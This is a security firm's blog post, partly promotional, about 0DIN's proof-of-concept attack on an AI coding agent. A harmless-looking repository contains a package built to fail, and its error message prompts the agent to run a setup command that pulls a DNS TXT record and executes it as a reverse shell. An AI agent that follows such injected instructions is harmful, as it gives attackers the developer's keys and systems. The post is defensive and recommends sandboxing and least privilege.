top of page

AI Coding Agents Tricked Into Running Hidden Malware

  • 4 days ago
  • 6 min read
AI Coding Agents

By Yonatan Hoorizadeh — CISSP, CISM, CRISC, AAISM

Published By: Purple Shield Security

Published: June 29, 2026

Last updated: June 29, 2026


Security researchers at 0DIN showed that an AI coding agent can be tricked into running hidden malware from a GitHub repository that contains no malicious code. The payload is fetched at runtime from a DNS record, so scanners, human reviewers, and the agent itself never see it. The agent runs it while trying to fix a routine setup error.


A working reverse shell appeared on a developer's machine after an AI assistant was asked to do one ordinary thing: get a freshly cloned project running. No exploit code sat in the repository. No alarming command was approved. The agent read the setup notes, hit an error, ran the documented fix, and that fix quietly opened a connection back to an attacker's server. That is the uncomfortable part of this finding — nothing about it looks like an attack until it already is one.


What did researchers actually find?


Researchers at 0DIN, Mozilla's Zero Day Investigative Network, demonstrated that an agentic coding tool can be steered into executing a malicious payload that never appears in the repository it cloned. The proof-of-concept used Anthropic's Claude Code, and the researchers stressed there was "no exploit code, no warning, no suspicious command anyone had to approve." The repository passes review because every file in it is genuinely harmless.


An agentic coding tool is an AI assistant that doesn't just suggest code — it clones repositories, runs setup commands, installs dependencies, and fixes errors on its own. That autonomy is the selling point. It is also, as this research shows, the attack surface. The work is currently a proof-of-concept, not an attack seen in the wild, but BleepingComputer reported that 0DIN warns the same repositories could be seeded through fake job postings, tutorials, blog posts, or direct messages.


Why does a clean repo matter to a business?


It matters because every defense most companies rely on for software supply-chain risk assumes the malicious code is somewhere to be found. Here, there is nothing to find. The repository is clean to static scanners, clean to human reviewers, and clean to the AI agent reading it. The malicious instruction only exists for the few seconds it is pulled from an external source and run.


If the attack succeeds, the attacker gets an interactive shell running with the developer's own privileges. According to the 0DIN research, that means access to environment variables, API keys, local configuration files, and a foothold to establish persistence. For most small and mid-market firms, a developer laptop is not a sandbox — it holds cloud credentials, production access, and customer data paths. One compromised setup step can become a direct line into your cloud environment.


This is squarely an AI security problem, not a traditional malware problem. The vulnerability isn't a bug in a product you can patch. It is the unconditional trust an autonomous agent places in setup instructions and error messages it was never designed to question.


How does the attack work without any malicious code?


The attack chains three steps that are each harmless on their own. The repository ships with normal-looking setup instructions. A Python package is built to fail on first run, producing an error that tells the user — or the agent — to run an initialization command. That command quietly pulls a value from an attacker-controlled DNS TXT record and executes it. The decoded value is a reverse shell.


The reason conventional defenses miss it comes down to where each piece lives. As the 0DIN researchers put it: "Claude Code never decided to open a shell. It decided to fix an error." The malicious instruction is split across the repository, the DNS infrastructure, and the developer's trust in their AI agent — three systems that are never examined together. A static scanner sees an ordinary DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorized setup step. None looks malicious alone.


The technique is a form of indirect prompt injection — where untrusted content an AI agent reads (a repo, documentation, an error message) carries instructions the agent then acts on. Once an agent is authorized to run shell commands, that injected instruction can reach everything the developer can reach.


Who is exposed, and how would a vCISO triage this?


Any team that lets AI coding agents clone and run untrusted repositories is exposed — which increasingly means most software, data, and product teams. The first move isn't a tool purchase. It is finding out where these agents are already running, what they're allowed to do, and whose credentials they inherit. That visibility is exactly what experienced security leadership produces, and it is where vCISO services earn their place.


In the first 24 to 72 hours, a security leader would treat any AI agent that clones external repos and runs setup code as an arbitrary-code-execution path — because that is what it is. That means identifying which agents are in use, confirming they don't run with standing access to production secrets, and putting untrusted repositories behind a sandbox or a container with no live credentials. The goal is to remove the blast radius before the technique moves from proof-of-concept to commodity.


For a mid-market company without a full-time security executive, this is the gap fractional CISO services are built to close. Most firms adopting AI development tools have moved faster on capability than on governance — there is no policy for what an agent may touch, no inventory of which tools are running, and no owner for the decision. A part-time CISO supplies that ownership without the cost of a full-time hire, and Purple Shield works with firms in exactly that position.


What should your business do?


Start by treating AI coding agents as privileged software that runs code, because they do. The 0DIN researchers recommend that agents disclose the full execution chain of any setup command — including scripts and anything fetched at runtime — before running it. Until tools do that by default, the responsibility sits with you.


Concrete steps worth taking now:

  • Inventory which AI coding agents are in use across your teams, including unsanctioned ones individual developers installed on their own.

  • Run untrusted or unfamiliar repositories inside a sandbox or disposable container that holds no live API keys, cloud tokens, or production credentials.

  • Scope agent permissions to least privilege, so an agent fixing a setup error cannot reach secrets it never needed.

  • Treat setup instructions and scripts in unfamiliar repos as untrusted code, regardless of what the AI tool recommends doing with them.

  • Assign a clear owner for the question: who decides what our AI agents are allowed to touch? If no one can answer, that is the gap to close first.


None of this requires halting AI adoption. It requires governing it deliberately instead of trusting that the agent is checking for security on your behalf. It is not.


Frequently asked questions


Is this attack happening in the wild right now?

Not as of late June 2026. 0DIN's work is a proof-of-concept, and there are no confirmed in-the-wild exploits or an official patch. But the researchers warned that attackers could distribute these repositories through fake job postings, tutorials, and direct messages, so the window between concept and real-world use is the time to prepare.


Does this only affect Claude Code?

No. The demonstration used Claude Code, but the weakness is structural to agentic coding tools in general — any AI agent authorized to clone repos and run setup commands automatically. The issue is the trust model, not one vendor's product. Treat every coding agent with these permissions the same way.


Will antivirus or code scanning catch this?

No, and that is the point. The repository contains no malicious code, so static scanners and human review find nothing. The payload is fetched from a DNS TXT record at runtime and never stored in a file. Detection has to focus on agent behavior and least-privilege containment, not file scanning.


We're a small company without a CISO. Where do we start?

Start with visibility: list which AI coding tools your team uses and what credentials those tools can reach. If no one owns that question, a fractional CISO can stand up the inventory, set agent permission policy, and define a sandboxing standard in weeks rather than building a security program from scratch.


AI development tools are moving into companies faster than the governance around them. If you want a second set of eyes on what your AI agents can touch — and who is accountable for that decision — Purple Shield's AI security and vCISO work is built for exactly this. As a vendor-neutral advisory firm, we help you adopt AI tools safely without selling you the tools. That is a conversation worth having before the next proof-of-concept becomes a real one.

 
 
bottom of page